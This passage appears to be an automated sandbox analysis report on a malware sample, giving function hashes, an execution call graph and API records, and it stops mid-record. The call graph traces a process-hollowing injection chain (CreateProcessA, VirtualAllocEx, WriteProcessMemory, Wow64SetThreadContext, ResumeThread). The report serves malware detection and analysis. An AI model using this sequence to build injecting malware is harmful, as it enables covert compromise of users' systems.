                                                        • Instruction ID: e53e42892f9f2de9f84c8a42c02c11e6a839125064d6b70a185702d63802ab24
                                                        • Opcode Fuzzy Hash: f51b7264d4bef76102d279a50562111152197c7d1a05efd413a0e72b0e3b47f0
                                                        • Instruction Fuzzy Hash: B7F02433A04110CFEB228BF884911ACBFB5EAE812971C00A7D846DB351D335D842CB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01337EA8 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 579091c8c8a55cf8fcab1d1efc2178402a201f75491dbbfb94a726c2d22ec10e
                                                        • Instruction ID: bf9f8c5bb87d97db59719c66d0e481c40cc24f68d8a286613e99e420458ba0d9
                                                        • Opcode Fuzzy Hash: 579091c8c8a55cf8fcab1d1efc2178402a201f75491dbbfb94a726c2d22ec10e
                                                        • Instruction Fuzzy Hash: 2BF0C435B40114CFC704EB68D5A8BAC77B2EF88315F5144A8E9069B3A4DB35AD42CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013387E0 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b758983c67aa1b90de622135b320db37a787826f27001d823f810148fa42678
                                                        • Instruction ID: 1c6fb2836c2fae3df7525537933758608b7b8be96be4ea2fec24b99ea35de065
                                                        • Opcode Fuzzy Hash: 2b758983c67aa1b90de622135b320db37a787826f27001d823f810148fa42678
                                                        • Instruction Fuzzy Hash: F5F03C34A10319AFDF81FFB9E85069DBBF1EB40340F1087A9C0059B258EB316E059B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:8.6%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:267
                                                        Total number of Limit Nodes:15
                                                        execution_graph 38805 67499a0 38806 6749b2b 38805->38806 38808 67499c6 38805->38808 38808->38806 38809 6749590 38808->38809 38810 6749c20 PostMessageW 38809->38810 38811 6749c8c 38810->38811 38811->38808 38837 84d9e0 38838 84d9f4 38837->38838 38840 84da19 38838->38840 38841 84cad0 38838->38841 38842 84dbc0 LoadLibraryExW 38841->38842 38844 84dc39 38842->38844 38844->38840 38845 84f9e0 38846 84fa26 GetCurrentProcess 38845->38846 38848 84fa78 GetCurrentThread 38846->38848 38850 84fa71 38846->38850 38849 84fab5 GetCurrentProcess 38848->38849 38851 84faae 38848->38851 38852 84faeb 38849->38852 38850->38848 38851->38849 38857 4a60014 38852->38857 38862 4a60040 38852->38862 38853 84fb13 GetCurrentThreadId 38854 84fb44 38853->38854 38858 4a60019 38857->38858 38866 4a600a2 DuplicateHandle 38858->38866 38868 4a600a8 DuplicateHandle 38858->38868 38859 4a6006e 38859->38853 38863 4a6006e 38862->38863 38864 4a600a2 DuplicateHandle 38862->38864 38865 4a600a8 DuplicateHandle 38862->38865 38863->38853 38864->38863 38865->38863 38867 4a6013e 38866->38867 38867->38859 38869 4a6013e 38868->38869 38869->38859 38915 4a64210 38916 4a64278 CreateWindowExW 38915->38916 38918 4a64334 38916->38918 38918->38918 38812 4a66931 38813 4a669a2 38812->38813 38814 4a66a4c 38812->38814 38815 4a669fa CallWindowProcW 38813->38815 38817 4a669a9 38813->38817 38818 4a61dc4 38814->38818 38815->38817 38819 4a61dcf 38818->38819 38820 4a65199 38819->38820 38823 4a65189 38819->38823 38822 4a65197 38820->38822 38834 4a61eec CallWindowProcW CallWindowProcW 38820->38834 38826 4a652b0 38823->38826 38830 4a652c0 38823->38830 38828 4a652c0 38826->38828 38827 4a652d4 38827->38822 38828->38827 38835 4a61f3c CallWindowProcW CallWindowProcW 38828->38835 38831 4a652d4 38830->38831 38832 4a652ee 38830->38832 38831->38822 38832->38831 38836 4a61f3c CallWindowProcW CallWindowProcW 38832->38836 38834->38822 38835->38827 38836->38831 38870 7bd01c 38871 7bd034 38870->38871 38872 7bd08e 38871->38872 38873 4a61dc4 2 API calls 38871->38873 38877 4a643c8 38871->38877 38881 4a643bb 38871->38881 38886 4a6512b 38871->38886 38873->38872 38878 4a643ee 38877->38878 38879 4a61dc4 2 API calls 38878->38879 38880 4a6440f 38879->38880 38880->38872 38882 4a64418 38881->38882 38883 4a643c7 38881->38883 38882->38872 38884 4a61dc4 2 API calls 38883->38884 38885 4a6440f 38884->38885 38885->38872 38889 4a65165 38886->38889 38887 4a65199 38891 4a65197 38887->38891 38894 4a61eec CallWindowProcW CallWindowProcW 38887->38894 38889->38887 38890 4a65189 38889->38890 38892 4a652b0 2 API calls 38890->38892 38893 4a652c0 2 API calls 38890->38893 38891->38891 38892->38891 38893->38891 38894->38891 38583 6747038 38584 6746f4e 38583->38584 38586 6747008 38583->38586 38585 6746f63 38584->38585 38590 67483f6 38584->38590 38597 6748380 38584->38597 38603 6748390 38584->38603 38591 6748384 38590->38591 38593 67483f9 38590->38593 38609 67486c0 38591->38609 38626 6748658 38591->38626 38644 67486b3 38591->38644 38592 67483b2 38592->38585 38598 6748385 38597->38598 38600 67486c0 12 API calls 38598->38600 38601 67486b3 12 API calls 38598->38601 38602 6748658 12 API calls 38598->38602 38599 67483b2 38599->38585 38600->38599 38601->38599 38602->38599 38604 67483aa 38603->38604 38606 67486c0 12 API calls 38604->38606 38607 67486b3 12 API calls 38604->38607 38608 6748658 12 API calls 38604->38608 38605 67483b2 38605->38585 38606->38605 38607->38605 38608->38605 38610 67486d5 38609->38610 38661 6748c0d 38610->38661 38666 6748f4c 38610->38666 38677 6748ba5 38610->38677 38682 6748abb 38610->38682 38686 6748efe 38610->38686 38690 674883e 38610->38690 38694 6748973 38610->38694 38699 6748a91 38610->38699 38704 6748e71 38610->38704 38709 6748bf7 38610->38709 38716 67487d6 38610->38716 38721 6748a35 38610->38721 38725 6748d74 38610->38725 38731 674892b 38610->38731 38611 67486e7 38611->38592 38627 674865c 38626->38627 38629 6748662 38626->38629 38627->38629 38630 6748d74 2 API calls 38627->38630 38631 6748a35 2 API calls 38627->38631 38632 67487d6 2 API calls 38627->38632 38633 6748bf7 2 API calls 38627->38633 38634 6748e71 2 API calls 38627->38634 38635 6748a91 2 API calls 38627->38635 38636 6748973 2 API calls 38627->38636 38637 674883e 2 API calls 38627->38637 38638 6748efe 2 API calls 38627->38638 38639 6748abb 2 API calls 38627->38639 38640 6748ba5 2 API calls 38627->38640 38641 6748f4c 2 API calls 38627->38641 38642 6748c0d 2 API calls 38627->38642 38643 674892b 2 API calls 38627->38643 38628 67486e7 38628->38592 38629->38592 38630->38628 38631->38628 38632->38628 38633->38628 38634->38628 38635->38628 38636->38628 38637->38628 38638->38628 38639->38628 38640->38628 38641->38628 38642->38628 38643->38628 38645 67486bc 38644->38645 38647 6748d74 2 API calls 38645->38647 38648 6748a35 2 API calls 38645->38648 38649 67487d6 2 API calls 38645->38649 38650 6748bf7 2 API calls 38645->38650 38651 6748e71 2 API calls 38645->38651 38652 6748a91 2 API calls 38645->38652 38653 6748973 2 API calls 38645->38653 38654 674883e 2 API calls 38645->38654 38655 6748efe 2 API calls 38645->38655 38656 6748abb 2 API calls 38645->38656 38657 6748ba5 2 API calls 38645->38657 38658 6748f4c 2 API calls 38645->38658 38659 6748c0d 2 API calls 38645->38659 38660 674892b 2 API calls 38645->38660 38646 67486e7 38646->38592 38647->38646 38648->38646 38649->38646 38650->38646 38651->38646 38652->38646 38653->38646 38654->38646 38655->38646 38656->38646 38657->38646 38658->38646 38659->38646 38660->38646 38662 6748bac 38661->38662 38736 67467f0 38662->38736 38740 67467e8 38662->38740 38663 6748fa6 38744 674944b 38666->38744 38749 6749401 38666->38749 38754 6749440 38666->38754 38760 6749450 38666->38760 38667 6749075 38667->38611 38668 674896f 38668->38667 38673 6749450 2 API calls 38668->38673 38674 6749440 2 API calls 38668->38674 38675 6749401 2 API calls 38668->38675 38676 674944b 2 API calls 38668->38676 38673->38668 38674->38668 38675->38668 38676->38668 38678 674893d 38677->38678 38679 67488d0 38678->38679 38773 6746230 38678->38773 38777 674622b 38678->38777 38679->38611 38781 67469a0 38682->38781 38785 6746998 38682->38785 38683 67488d0 38683->38611 38688 67462e0 Wow64SetThreadContext 38686->38688 38689 67462d8 Wow64SetThreadContext 38686->38689 38687 6748f18 38688->38687 38689->38687 38691 6748874 38690->38691 38789 6746b2c 38690->38789 38793 6746b38 38690->38793 38695 674898d 38694->38695 38697 6746230 ResumeThread 38695->38697 38698 674622b ResumeThread 38695->38698 38696 67489a2 38696->38611 38696->38696 38697->38696 38698->38696 38700 6748ab4 38699->38700 38797 67468b0 38700->38797 38801 67468a8 38700->38801 38701 67490aa 38705 6748e77 38704->38705 38707 67468b0 WriteProcessMemory 38705->38707 38708 67468a8 WriteProcessMemory 38705->38708 38706 6748ede 38707->38706 38708->38706 38711 674896f 38709->38711 38710 6749075 38710->38611 38711->38710 38712 6749450 2 API calls 38711->38712 38713 6749440 2 API calls 38711->38713 38714 6749401 2 API calls 38711->38714 38715 674944b 2 API calls 38711->38715 38712->38711 38713->38711 38714->38711 38715->38711 38717 67487e0 38716->38717 38719 6746b2c CreateProcessA 38717->38719 38720 6746b38 CreateProcessA 38717->38720 38718 6748874 38719->38718 38720->38718 38723 67468b0 WriteProcessMemory 38721->38723 38724 67468a8 WriteProcessMemory 38721->38724 38722 6748a59 38722->38611 38723->38722 38724->38722 38727 674898d 38725->38727 38726 6748f44 38726->38611 38727->38726 38729 6746230 ResumeThread 38727->38729 38730 674622b ResumeThread 38727->38730 38728 67489a2 38728->38611 38728->38728 38729->38728 38730->38728 38732 6748954 38731->38732 38734 6746230 ResumeThread 38732->38734 38735 674622b ResumeThread 38732->38735 38733 67489a2 38733->38611 38733->38733 38734->38733 38735->38733 38737 6746830 VirtualAllocEx 38736->38737 38739 674686d 38737->38739 38739->38663 38741 67467ec VirtualAllocEx 38740->38741 38743 674686d 38741->38743 38743->38663 38745 6749450 38744->38745 38765 67462e0 38745->38765 38769 67462d8 38745->38769 38746 674947b 38746->38668 38750 6749476 38749->38750 38752 67462e0 Wow64SetThreadContext 38750->38752 38753 67462d8 Wow64SetThreadContext 38750->38753 38751 674947b 38751->38668 38752->38751 38753->38751 38755 6749444 38754->38755 38756 674944a 38754->38756 38755->38668 38758 67462e0 Wow64SetThreadContext 38756->38758 38759 67462d8 Wow64SetThreadContext 38756->38759 38757 674947b 38757->38668 38758->38757 38759->38757 38761 6749465 38760->38761 38763 67462e0 Wow64SetThreadContext 38761->38763 38764 67462d8 Wow64SetThreadContext 38761->38764 38762 674947b 38762->38668 38763->38762 38764->38762 38766 6746325 Wow64SetThreadContext 38765->38766 38768 674636d 38766->38768 38768->38746 38770 67462dc Wow64SetThreadContext 38769->38770 38772 674636d 38770->38772 38772->38746 38774 6746270 ResumeThread 38773->38774 38776 67462a1 38774->38776 38776->38679 38778 6746230 ResumeThread 38777->38778 38780 67462a1 38778->38780 38780->38679 38782 67469eb ReadProcessMemory 38781->38782 38784 6746a2f 38782->38784 38784->38683 38786 674699c ReadProcessMemory 38785->38786 38788 6746a2f 38786->38788 38788->38683 38790 6746b30 CreateProcessA 38789->38790 38792 6746d83 38790->38792 38794 6746bc1 CreateProcessA 38793->38794 38796 6746d83 38794->38796 38798 67468f8 WriteProcessMemory 38797->38798 38800 674694f 38798->38800 38800->38701 38802 67468ac WriteProcessMemory 38801->38802 38804 674694f 38802->38804 38804->38701 38895 844668 38896 844672 38895->38896 38898 844758 38895->38898 38899 84477d 38898->38899 38903 844858 38899->38903 38907 844868 38899->38907 38904 84488f 38903->38904 38906 84496c 38904->38906 38911 8444b0 38904->38911 38909 84488f 38907->38909 38908 84496c 38908->38908 38909->38908 38910 8444b0 CreateActCtxA 38909->38910 38910->38908 38912 8458f8 CreateActCtxA 38911->38912 38914 8459bb 38912->38914 38919 84d938 38920 84d980 GetModuleHandleW 38919->38920 38921 84d97a 38919->38921 38922 84d9ad 38920->38922 38921->38920

                                                        Executed Functions

                                                        Function 0084F9E0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 888 84f9e0-84fa6f GetCurrentProcess 892 84fa71-84fa77 888->892 893 84fa78-84faac GetCurrentThread 888->893 892->893 894 84fab5-84fae9 GetCurrentProcess 893->894 895 84faae-84fab4 893->895 896 84faf2-84fb0a 894->896 897 84faeb-84faf1 894->897 895->894 909 84fb0d call 4a60014 896->909 910 84fb0d call 4a60040 896->910 897->896 901 84fb13-84fb42 GetCurrentThreadId 902 84fb44-84fb4a 901->902 903 84fb4b-84fbad 901->903 902->903 909->901 910->901
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 0084FA5E
                                                        • GetCurrentThread.KERNEL32 ref: 0084FA9B
                                                        • GetCurrentProcess.KERNEL32 ref: 0084FAD8
                                                        • GetCurrentThreadId.KERNEL32 ref: 0084FB31
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1290266906.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_840000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: c9450585136f25c7a5b216a3fbe1830e85115cb71a2c526ef6adb57442f8aa1f
                                                        • Instruction ID: a652c24f23937c520470b0c6e1e7071bb04eb795a6e1ea35f477279745805998
                                                        • Opcode Fuzzy Hash: c9450585136f25c7a5b216a3fbe1830e85115cb71a2c526ef6adb57442f8aa1f
                                                        • Instruction Fuzzy Hash: 6A5145B0D00309CFEB14DFA9D548BAEBBF1FB88314F208459E509A73A1D7745944CB65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06746B2C Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1184 6746b2c-6746b2e 1185 6746b36-6746b39 1184->1185 1186 6746b30-6746b32 1184->1186 1188 6746b3a-6746bcd 1185->1188 1187 6746b34-6746b35 1186->1187 1186->1188 1187->1185 1190 6746c06-6746c26 1188->1190 1191 6746bcf-6746bd9 1188->1191 1198 6746c5f-6746c8e 1190->1198 1199 6746c28-6746c32 1190->1199 1191->1190 1192 6746bdb-6746bdd 1191->1192 1193 6746c00-6746c03 1192->1193 1194 6746bdf-6746be9 1192->1194 1193->1190 1196 6746bed-6746bfc 1194->1196 1197 6746beb 1194->1197 1196->1196 1200 6746bfe 1196->1200 1197->1196 1205 6746cc7-6746d81 CreateProcessA 1198->1205 1206 6746c90-6746c9a 1198->1206 1199->1198 1201 6746c34-6746c36 1199->1201 1200->1193 1203 6746c38-6746c42 1201->1203 1204 6746c59-6746c5c 1201->1204 1207 6746c44 1203->1207 1208 6746c46-6746c55 1203->1208 1204->1198 1219 6746d83-6746d89 1205->1219 1220 6746d8a-6746e10 1205->1220 1206->1205 1210 6746c9c-6746c9e 1206->1210 1207->1208 1208->1208 1209 6746c57 1208->1209 1209->1204 1211 6746ca0-6746caa 1210->1211 1212 6746cc1-6746cc4 1210->1212 1214 6746cac 1211->1214 1215 6746cae-6746cbd 1211->1215 1212->1205 1214->1215 1215->1215 1217 6746cbf 1215->1217 1217->1212 1219->1220 1230 6746e20-6746e24 1220->1230 1231 6746e12-6746e16 1220->1231 1233 6746e34-6746e38 1230->1233 1234 6746e26-6746e2a 1230->1234 1231->1230 1232 6746e18 1231->1232 1232->1230 1235 6746e48-6746e4c 1233->1235 1236 6746e3a-6746e3e 1233->1236 1234->1233 1237 6746e2c 1234->1237 1239 6746e5e-6746e65 1235->1239 1240 6746e4e-6746e54 1235->1240 1236->1235 1238 6746e40 1236->1238 1237->1233 1238->1235 1241 6746e67-6746e76 1239->1241 1242 6746e7c 1239->1242 1240->1239 1241->1242 1244 6746e7d 1242->1244 1244->1244
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06746D6E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: ee52cdf3bc807396b4842d597b40858799c48439c44e1a5d4a114af0a7ec6959
                                                        • Instruction ID: 47fd790c5b10187d166e74be455476d34ba2ba3879855c7b9e795399f52c5d1e
                                                        • Opcode Fuzzy Hash: ee52cdf3bc807396b4842d597b40858799c48439c44e1a5d4a114af0a7ec6959
                                                        • Instruction Fuzzy Hash: ABA15971D003298FEF64DFA8C8857EDBBB2FB49310F148569E818A7240DB759985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06746B38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1245 6746b38-6746bcd 1247 6746c06-6746c26 1245->1247 1248 6746bcf-6746bd9 1245->1248 1255 6746c5f-6746c8e 1247->1255 1256 6746c28-6746c32 1247->1256 1248->1247 1249 6746bdb-6746bdd 1248->1249 1250 6746c00-6746c03 1249->1250 1251 6746bdf-6746be9 1249->1251 1250->1247 1253 6746bed-6746bfc 1251->1253 1254 6746beb 1251->1254 1253->1253 1257 6746bfe 1253->1257 1254->1253 1262 6746cc7-6746d81 CreateProcessA 1255->1262 1263 6746c90-6746c9a 1255->1263 1256->1255 1258 6746c34-6746c36 1256->1258 1257->1250 1260 6746c38-6746c42 1258->1260 1261 6746c59-6746c5c 1258->1261 1264 6746c44 1260->1264 1265 6746c46-6746c55 1260->1265 1261->1255 1276 6746d83-6746d89 1262->1276 1277 6746d8a-6746e10 1262->1277 1263->1262 1267 6746c9c-6746c9e 1263->1267 1264->1265 1265->1265 1266 6746c57 1265->1266 1266->1261 1268 6746ca0-6746caa 1267->1268 1269 6746cc1-6746cc4 1267->1269 1271 6746cac 1268->1271 1272 6746cae-6746cbd 1268->1272 1269->1262 1271->1272 1272->1272 1274 6746cbf 1272->1274 1274->1269 1276->1277 1287 6746e20-6746e24 1277->1287 1288 6746e12-6746e16 1277->1288 1290 6746e34-6746e38 1287->1290 1291 6746e26-6746e2a 1287->1291 1288->1287 1289 6746e18 1288->1289 1289->1287 1292 6746e48-6746e4c 1290->1292 1293 6746e3a-6746e3e 1290->1293 1291->1290 1294 6746e2c 1291->1294 1296 6746e5e-6746e65 1292->1296 1297 6746e4e-6746e54 1292->1297 1293->1292 1295 6746e40 1293->1295 1294->1290 1295->1292 1298 6746e67-6746e76 1296->1298 1299 6746e7c 1296->1299 1297->1296 1298->1299 1301 6746e7d 1299->1301 1301->1301
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06746D6E
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: c08eeedf5bd525e67c71360038dcf68c4eeff3ea10f8ccb01adf39a9f27ac732
                                                        • Instruction ID: 8a16b0d0227147d215f2989dccfb27319104c3646db42cc6f91b0847fe002d55
                                                        • Opcode Fuzzy Hash: c08eeedf5bd525e67c71360038dcf68c4eeff3ea10f8ccb01adf39a9f27ac732
                                                        • Instruction Fuzzy Hash: BE914871D003298FEF64DFA9C884BADBBF2FB49310F148569E818A7240DB759985CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A64204 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1302 4a64204-4a6420d 1303 4a64260-4a64276 1302->1303 1304 4a6420f-4a6425e 1302->1304 1305 4a64281-4a64288 1303->1305 1306 4a64278-4a6427e 1303->1306 1304->1303 1307 4a64293-4a642cb 1305->1307 1308 4a6428a-4a64290 1305->1308 1306->1305 1309 4a642d3-4a64332 CreateWindowExW 1307->1309 1308->1307 1310 4a64334-4a6433a 1309->1310 1311 4a6433b-4a64373 1309->1311 1310->1311 1315 4a64375-4a64378 1311->1315 1316 4a64380 1311->1316 1315->1316 1317 4a64381 1316->1317 1317->1317
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A64322
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297161494.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_4a60000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 402815c10c0e63831c0963a455bf918445b7d0a1c49dc242256e170fa7ce12fd
                                                        • Instruction ID: f4f84e874d9db8217ca637c21484043a71e77368ed11590dda4024c81541aae6
                                                        • Opcode Fuzzy Hash: 402815c10c0e63831c0963a455bf918445b7d0a1c49dc242256e170fa7ce12fd
                                                        • Instruction Fuzzy Hash: 1951C1B5D003499FDB25CFA9D884ADEFBB5BF48310F24812AE819AB210D775A845CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A64210 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1318 4a64210-4a64276 1319 4a64281-4a64288 1318->1319 1320 4a64278-4a6427e 1318->1320 1321 4a64293-4a64332 CreateWindowExW 1319->1321 1322 4a6428a-4a64290 1319->1322 1320->1319 1324 4a64334-4a6433a 1321->1324 1325 4a6433b-4a64373 1321->1325 1322->1321 1324->1325 1329 4a64375-4a64378 1325->1329 1330 4a64380 1325->1330 1329->1330 1331 4a64381 1330->1331 1331->1331
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04A64322
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297161494.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_4a60000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 8c255748836df1cb4878aa7ac9c19487193c04aaf7fb6375dc40d9c2dc7c4955
                                                        • Instruction ID: f6fbb81f18d2af6f9b381c9b5db6d881e48ffed4a5f1c4c4e11998d45017f84e
                                                        • Opcode Fuzzy Hash: 8c255748836df1cb4878aa7ac9c19487193c04aaf7fb6375dc40d9c2dc7c4955
                                                        • Instruction Fuzzy Hash: 9241A0B1D00349DFDB15CFA9D884ADEBBB5BF48310F24812AE819AB250D775A845CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008458EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 008459A9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1290266906.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_840000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 7d7d7ee5810d9c7d8655b77fbd7ac1f15e0ebd810837ce7a91e90664ea865bca
                                                        • Instruction ID: 6b351e77cd27fe3ad0bc56c1b5705eda0099f095ea1048fe17dff96de2f59fa2
                                                        • Opcode Fuzzy Hash: 7d7d7ee5810d9c7d8655b77fbd7ac1f15e0ebd810837ce7a91e90664ea865bca
                                                        • Instruction Fuzzy Hash: 5741CF70C0075DCBEB24DFAAC884BDDBBB5BF49304F20816AD409AB255DB755946CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04A61EEC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A66A21
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297161494.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A60000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_4a60000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 61fb66446bbe97e2653c22b1b22dcadf24162ebc2f79cfaa041482870ad71a74
                                                        • Instruction ID: 0b8d31c721915532188bd144ea934978e5cc4742d6dfd002d2562823b88a6aef
                                                        • Opcode Fuzzy Hash: 61fb66446bbe97e2653c22b1b22dcadf24162ebc2f79cfaa041482870ad71a74
                                                        • Instruction Fuzzy Hash: A0412CB5A00305CFDB14CF95C488AAABBF5FF88314F24C459D51AAB361D374A841CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008444B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 008459A9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1290266906.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_840000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: eb15d55a8d7bc8f79311bbf532b88f12653a6a3e7f581ce32cde55ec700ddea7
                                                        • Instruction ID: d5a3976c477de081be7e14cdf446a66f235c6045a6a5a8aa5035447eebf5c58c
                                                        • Opcode Fuzzy Hash: eb15d55a8d7bc8f79311bbf532b88f12653a6a3e7f581ce32cde55ec700ddea7
                                                        • Instruction Fuzzy Hash: 83419F70C0075DCBEB24DFAAC884BDEBBB5BF49304F20816AD409AB255DB756946CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06746998 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06746A20
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 8518bc19d0a02006751bf692da8e446d983418143ec80aed4cecb8bb9dd71e5f
                                                        • Instruction ID: f645a5341eb50f17b2e19f72137efd22f626cda62aaf8058ae0555a5b7310d5f
                                                        • Opcode Fuzzy Hash: 8518bc19d0a02006751bf692da8e446d983418143ec80aed4cecb8bb9dd71e5f
                                                        • Instruction Fuzzy Hash: 18319A71C002588FDF20DFA9D884AEEBBF0FF49310F10882EE565A7641C7389501CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 067468A8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06746940
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1297925881.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_6740000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: a6472e044fa8a9e3e5e93c24b190c61414593dc4743c63e7ff9874aa4b7997bf
                                                        • Instruction ID: 11f2b5922e27bd1f2baacbc4961abf819c0b746589329388d44c3861512ebbba
                                                        • Opcode Fuzzy Hash: a6472e044fa8a9e3e5e93c24b190c61414593dc4743c63e7ff9874aa4b7997bf
